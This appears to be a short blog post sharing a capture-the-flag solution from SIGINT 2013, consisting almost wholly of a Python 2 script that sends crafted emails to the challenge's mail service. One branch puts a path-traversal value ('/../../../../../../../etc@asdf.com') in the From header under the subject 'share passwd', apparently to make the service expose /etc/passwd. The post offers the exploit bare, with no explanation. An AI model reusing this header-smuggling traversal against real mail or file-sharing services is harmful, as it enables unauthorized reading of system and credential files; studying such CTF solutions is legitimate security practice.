Computer Security/CTF
[SIGINT 2013] mail exploit
tunz
2013. 7. 8. 01:04
import smtplib import sys sender = 'hans@ck.er' receivers = ['test@b3.ctf.sigint.ccc.de'] if sys.argv[1] == "tunz": message = """From: ~~~~~~your email address~~~~~~ To: cloud <test@b3.ctf.sigint.ccc.de> Subject: get passwd This is a test e-mail message. """ else: message = """From: /../../../../../../../etc@asdf.com To: cloud <test@b3.ctf.sigint.ccc.de> Subject: share passwd ~~~~~~your email address~~~~~~ This is a test e-mail message. """ print message smtpObj = smtplib.SMTP('localhost') smtpObj.sendmail(sender, receivers, message) print "Successfully sent email"